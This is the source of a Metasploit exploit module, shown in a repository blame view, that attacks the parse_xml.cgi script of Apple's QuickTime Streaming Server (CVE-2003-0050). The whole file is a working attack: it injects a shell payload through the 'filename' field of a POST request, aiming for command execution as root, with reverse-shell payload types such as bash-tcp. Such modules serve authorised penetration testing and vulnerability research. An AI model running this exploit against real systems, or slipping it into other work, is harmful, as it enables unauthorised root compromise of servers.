Files
metasploit-gs/modules/exploits/unix/webapp/qtss_parse_xml_exec.rb
T

76 lines
2.0 KiB
Ruby
Raw Normal View History

##
2017-07-24 06:26:21 -07:00
# This module requires Metasploit: https://metasploit.com/download
2013-10-15 13:50:46 -05:00
# Current source: https://github.com/rapid7/metasploit-framework
##
2016-03-08 14:02:44 +01:00
class MetasploitModule < Msf::Exploit::Remote
2013-08-30 16:28:54 -05:00
Rank = ExcellentRanking
2013-08-30 16:28:54 -05:00
include Msf::Exploit::Remote::HttpClient
2013-08-30 16:28:54 -05:00
def initialize(info = {})
super(update_info(info,
'Name' => 'QuickTime Streaming Server parse_xml.cgi Remote Execution',
'Description' => %q{
The QuickTime Streaming Server contains a CGI script that is vulnerable
to metacharacter injection, allow arbitrary commands to be executed as root.
},
'Author' => [ 'hdm' ],
'License' => MSF_LICENSE,
'References' =>
[
[ 'OSVDB', '10562'],
2013-08-30 16:28:54 -05:00
[ 'BID', '6954' ],
[ 'CVE', '2003-0050' ]
],
'Privileged' => true,
'Payload' =>
{
'DisableNops' => true,
'Space' => 512,
'Compat' =>
{
'PayloadType' => 'cmd cmd_bash',
'RequiredCmd' => 'generic perl bash-tcp telnet',
2013-08-30 16:28:54 -05:00
}
},
'Platform' => 'unix',
'Arch' => ARCH_CMD,
'Targets' => [[ 'Automatic', { }]],
'DefaultTarget' => 0,
'DisclosureDate' => 'Feb 24 2003'
))
2013-08-30 16:28:54 -05:00
register_options(
[
Opt::RPORT(1220)
])
2013-08-30 16:28:54 -05:00
end
2013-08-30 16:28:54 -05:00
def exploit
2013-08-30 16:28:54 -05:00
print_status("Sending post request with embedded command...")
2013-08-30 16:28:54 -05:00
data = "filename=" + Rex::Text.uri_encode(";#{payload.encoded}|")
2013-08-30 16:28:54 -05:00
response = send_request_raw({
'uri' => "/parse_xml.cgi",
'method' => 'POST',
'data' => data,
'headers' =>
{
'Content-Type' => 'application/x-www-form-urlencoded',
'Content-Length' => data.length,
}
}, 3)
2013-08-30 16:28:54 -05:00
# If the upload worked, the server tries to redirect us to some info
# about the file we just saved
if response and response.code != 200
print_error("Server returned non-200 status code (#{response.code})")
end
2013-08-30 16:28:54 -05:00
handler
end
end